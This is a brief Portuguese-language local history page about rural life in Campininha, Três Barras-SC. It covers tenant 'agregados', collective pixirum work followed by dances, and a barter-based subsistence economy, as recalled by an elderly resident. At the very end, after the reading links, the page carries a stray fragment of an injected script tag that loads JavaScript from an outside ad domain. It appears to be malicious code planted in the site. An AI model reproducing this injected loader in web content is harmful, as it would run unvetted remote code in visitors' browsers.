No passado, era comum os grandes proprietários de terras, terem agregados em suas propriedades. Na localidade da Campininha, em Três Barras-SC, podemos citar o caso do senhor João Pedro de Oliveira, cidadão tresbarrense, homenageado com o nome na E.B.M. “João Pedro de Oliveira”. Julio de Oliveira, conhecido como Seu Julico, aos 88 anos de idade, descreve como funcionava o sistema de agregados do avô.
Agregados:
Muito diferente do atual modelo capitalista de produção agrícola, os pequenos agricultores organizavam-se coletivamente. O chamado pixirum era usado no roçado, na plantação e na colheita. A união de diferentes famílias, durante o árduo trabalho diário, terminava com um baile. Seu Julico participou de pixiruns e recorda como eles aconteciam.
Pixirum
A economia de subsistência, baseada na troca de alguns produtos, entre os pequenos agricultores, garantia o abastecimento alimentício dos lares. As relações de solidariedade marcaram a memória daqueles que viveram na localidade da Campininha- Três Barras-SC.
Economia
Sistema de agregados, pixirum e economia de subsistência baseada na troca de alguns produtos, com pouca circulação do dinheiro, aos poucos vêm sendo substituídos pelo modelo capitalista de produção agrícola. As relações de solidariedade no trabalho, abriram espaço para a concorrência entre os agricultores do campo.
Para saber mais:
Entrevista completa disponível: https://www.ecosdocontestado.com/memorias
Sobre a Tafona (citada no vídeo “economia”):
http://g1.globo.com/sc/santa-catarina/jornal-do-almoco/videos/v/conheca-a-pratica-da-tafona-tarefa-que-passa-por-geracoes-no-sul-do-estado/6058086/… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>